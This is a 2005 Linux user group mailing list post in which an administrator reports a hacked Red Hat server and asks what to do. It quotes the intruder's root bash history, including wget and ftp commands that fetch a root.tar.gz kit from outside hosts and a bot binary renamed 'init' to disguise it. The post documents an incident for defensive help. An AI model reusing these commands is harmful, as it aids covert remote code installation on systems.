[wellylug] Think I've had a server hacked
Mark Signal
mark at databackup.co.nz
Wed Oct 26 10:25:17 NZDT 2005
Hi
I setup a box ages ago for a client - redhat 7.2/Mitel with only ssh port
open
root password just got changed and /var/log/auth deleted
last login from 82.123.175.245 (somewhere in europe - normally only
connections from Lower Hutt :)
root bash history has..
w
passwd
uname -a
ps x
w
cd /var/tmp
ls
wget hash.idilis.ro/root.tar.gz
wget 217.156.85.3/root.tar.gz
fr hash.idilis.ro
ftp hash.idilis.ro
ftp 217.156.85.3
tar xzvf mech*
cd mech
mv bash init
PATH=:.PATH
init
init
init
I am copying all the data off (including /var/logs/) and will
reinstall/update and shift ssh port
is there anything else I can/should do?
cheers
Mark
--
No virus found in this outgoing message.
Checked by AVG Free Edition.
Version: 7.1.361 / Virus Database: 267.12.5/147 - Release Date: 24/10/2005
More information about the wellylug
mailing list